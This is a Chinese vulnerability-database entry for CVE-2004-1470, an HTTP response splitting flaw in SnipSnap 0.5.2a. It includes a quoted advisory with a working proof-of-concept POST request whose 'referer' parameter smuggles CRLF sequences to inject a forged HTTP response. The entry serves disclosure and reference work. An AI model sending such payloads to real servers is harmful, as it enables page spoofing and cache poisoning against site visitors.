SnipSnap HTTP响应拆分漏洞

SnipSnap HTTP响应拆分漏洞

漏洞ID 1108171 漏洞类型 输入验证
发布时间 2004-09-14 更新时间 2005-10-20
图片[1]-SnipSnap HTTP响应拆分漏洞-安全小百科CVE编号 CVE-2004-1470
图片[2]-SnipSnap HTTP响应拆分漏洞-安全小百科CNNVD-ID CNNVD-200412-332
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/24598
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-332
|漏洞详情
SnipSnap0.5.2a版本和其他1.0b1以前的版本存在CRLF注入漏洞。远程攻击者可以执行HTTP响应拆分攻击修改服务器预定HTML内容。
|漏洞EXP
source: http://www.securityfocus.com/bid/11180/info

SnipSnap is reported prone to an HTTP response splitting vulnerability. The issue exists in the 'referer' parameter. The issue presents itself due to a flaw in the application that allows an attacker to manipulate how POST requests are handled.

This issue was identified in SnipSnap 0.5.2a and prior.

The following proof of concept example is available: 
POST /exec/authenticate HTTP/1.0
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-length: 197

referer=abc%0d%0aConnection:%20keep-alive%0d%0aContent-Length:%200%0d%0a%0d%
0aHTTP/1.0%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:20%0d%
0a%0d%0a<html>0wned!!</html>&cancel=cancel
|参考资料

来源:BID
名称:11180
链接:http://www.securityfocus.com/bid/11180
来源:GENTOO
名称:GLSA-200409-23
链接:http://www.gentoo.org/security/en/glsa/glsa-200409-23.xml
来源:XF
名称:snipsnap-response-splitting(17364)
链接:http://xforce.iss.net/xforce/xfdb/17364
来源:www.snipsnap.org
链接:http://www.snipsnap.org/space/start
来源:BUGTRAQ
名称:20040914ADVISORY:httpresponsesplittinginsnipsnap
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109518773223511&w;=2

相关推荐: Kolban Webcam32缓冲区溢出漏洞

Kolban Webcam32缓冲区溢出漏洞 漏洞ID 1207297 漏洞类型 缓冲区溢出 发布时间 1998-09-01 更新时间 1998-09-01 CVE编号 CVE-1999-1292 CNNVD-ID CNNVD-199809-005 漏洞平台 …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享